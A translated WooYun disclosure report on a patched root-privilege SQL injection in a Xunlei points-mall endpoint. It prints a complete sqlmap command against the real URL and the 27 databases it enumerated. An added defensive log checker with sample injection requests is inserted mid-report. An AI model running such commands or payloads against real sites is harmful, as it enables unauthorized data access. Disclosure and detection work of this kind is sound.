Vulnerability summary

Defect ID: wooyun-2015-0112383

Title: Root-privilege SQL injection on a Xunlei site affects nearly 30 databases

Vendor: Xunlei (迅雷)

Author: BMa

Submitted: 2015-05-06 11:24

Fixed: 2015-06-20 11:34

Published: 2015-06-20 11:34

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Confirmed by vendor

Source: http://www.wooyun.org. For questions or help, contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-05-06: Details sent to the vendor, awaiting vendor handling
2015-05-06: Vendor confirmed; details disclosed to the vendor only
2015-05-16: Details disclosed to core white hats and domain experts
2015-05-26: Details disclosed to regular white hats
2015-06-05: Details disclosed to intern white hats
2015-06-20: Details disclosed to the public

Brief description:

To submit or not to submit, that is the question
Whether it passes or not is up to WooYun
There seems to be quite a lot of data; here is one example, I did not look at the contents

Detailed description:

The site is: jifenshangcheng.m.xunlei.com

sqlmap.py -u "http://jifenshangcheng.m.xunlei.com/cgi-bin/integra_info?userId=219509333&peerId=F8A45F540116004V&_t=1428930321760&callback=jsonp1"


There may also be a broken access control (IDOR) issue here
Straight to the data:
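For the defender's side, an added example that is not part of the original report: a small log checker that looks for requests to the integra_info endpoint whose parameters do not have the shape of the legitimate request quoted above (userId and _t numeric, peerId 16 upper-case alphanumerics, callback a plain JavaScript identifier). The log lines and the parameter shapes are constructed assumptions based only on that one request.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not from the report): one normal request to the
# endpoint named in the report, two carrying tampered userId values, and one to another path.
SAMPLE_LOG = """\
10.0.0.5 - - [06/May/2015:11:20:01 +0800] "GET /cgi-bin/integra_info?userId=219509333&peerId=F8A45F540116004V&_t=1428930321760&callback=jsonp1 HTTP/1.1" 200 512
10.0.0.9 - - [06/May/2015:11:20:02 +0800] "GET /cgi-bin/integra_info?userId=219509333%20AND%201%3D1&peerId=F8A45F540116004V&_t=1428930321760&callback=jsonp1 HTTP/1.1" 200 512
10.0.0.9 - - [06/May/2015:11:20:03 +0800] "GET /cgi-bin/integra_info?userId=219509333'&peerId=F8A45F540116004V&_t=1&callback=jsonp1 HTTP/1.1" 500 0
10.0.0.9 - - [06/May/2015:11:20:04 +0800] "GET /cgi-bin/other?userId=1' HTTP/1.1" 200 10
"""

# Common-log-format request line: client IP, timestamp, GET target, HTTP status.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "GET (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Expected parameter shapes, inferred (assumption) from the legitimate request in the report.
PARAM_SHAPES = {
    "userId": re.compile(r"^\d{1,20}$"),
    "peerId": re.compile(r"^[0-9A-Z]{16}$"),
    "_t": re.compile(r"^\d{1,20}$"),
    "callback": re.compile(r"^[A-Za-z_$][A-Za-z0-9_$]{0,63}$"),
}

def check_request(target):
    """Return the (param, decoded value) pairs of an integra_info request that break the expected shape."""
    parts = urlsplit(target)
    if parts.path != "/cgi-bin/integra_info":
        return []
    query = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes the values
    bad = []
    for name, pattern in PARAM_SHAPES.items():
        for value in query.get(name, []):
            if not pattern.match(value):
                bad.append((name, value))
    return bad

def scan_log(text):
    """Return one finding per log line whose integra_info parameters look tampered with."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        bad = check_request(m.group("target"))
        if bad:
            findings.append({"ip": m.group("ip"), "status": m.group("status"), "params": bad})
    return findings

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```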

available databases [27]:
[*] resgroupstat
[*] commons
[*] export_resource
[*] friend_data
[*] guaguale
[*] hongbao
[*] information_schema
[*] integration
[*] mk_source
[*] mobile_thunder_res_detail
[*] mysql
[*] nx
[*] performance_schema
[*] push
[*] push_android
[*] quan
[*] resgroup
[*] resgroup_temp
[*] resource_reports
[*] sina_caipiao
[*] smarthdd
[*] statistic_data
[*] test
[*] tmp
[*] wx_share
[*] xl_stat
[*] xl_video_dict
back-end DBMS: MySQL 5.0.11


Proof of vulnerability:

Fix recommendation:

Copyright notice: please credit BMa@乌云 (WooYun) when reposting


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2015-05-06 11:34

Vendor reply:

Thanks for the report!

Latest status:

None yet


Vulnerability rating:

Comments

  1. 2015-05-06 11:26 | prolog ( Regular white hat | Rank:544 Vulnerabilities:107 | Keeping a low profile and growing )

    Thumbs up

  2. 2015-05-06 11:34 | BMa ( Regular white hat | Rank:1776 Vulnerabilities:200 )

    OK, I removed some of the rambling content